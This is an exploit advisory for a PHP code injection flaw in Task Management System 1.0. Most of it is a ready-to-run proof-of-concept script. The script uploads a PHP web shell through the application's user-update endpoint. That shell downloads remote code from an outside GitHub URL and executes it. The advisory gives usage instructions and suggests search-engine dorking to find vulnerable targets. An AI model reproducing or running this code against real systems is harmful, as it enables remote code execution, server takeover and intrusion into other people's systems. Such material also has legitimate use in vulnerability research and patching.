Task Management System version 1.0 suffers from a PHP code injection vulnerability.
=============================================================================================================================================
| # Title : Task Management System 1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.campcodes.com/downloads/task-management-system-in-php-mysql-source-code/?wpdmdl=8164&refresh=66bb949d45e891723569309 |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This PHP code is designed to create a file and inject PHP code.
[+] save payload as poc.php
[+] usage : C:wwwtest>php poc.php 127.0.0.1
[+] payload :
<?php
function file_upload($target_ip) {
$file_name = "indoushka.php";
$webshell_payload = "<?php
$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
curl_close($ch);
if ($output) {
include 'data://text/plain;base64,' . base64_encode($output);
}
?>";
$post_fields = array(
'save' => '',
'firstname' => 'az',
'lastname' => 'azgt',
'email' => '[email protected]',
'password' => 'az@gtgt',
'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),
'qty' => '1'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$target_ip/ajax.php?action=update_user");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
echo "(+) Shell uploaded successfully.n";
echo "(+) Access the shell at: $target_ip/assets/uploads/n";
}
if ($argc != 2) {
echo "(+) Usage: php " . $argv[0] . " <target ip>n";
echo "(+) Example: php " . $argv[0] . " 10.0.0.1n";
exit(-1);
}
$target_ip = $argv[1];
file_upload($target_ip);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================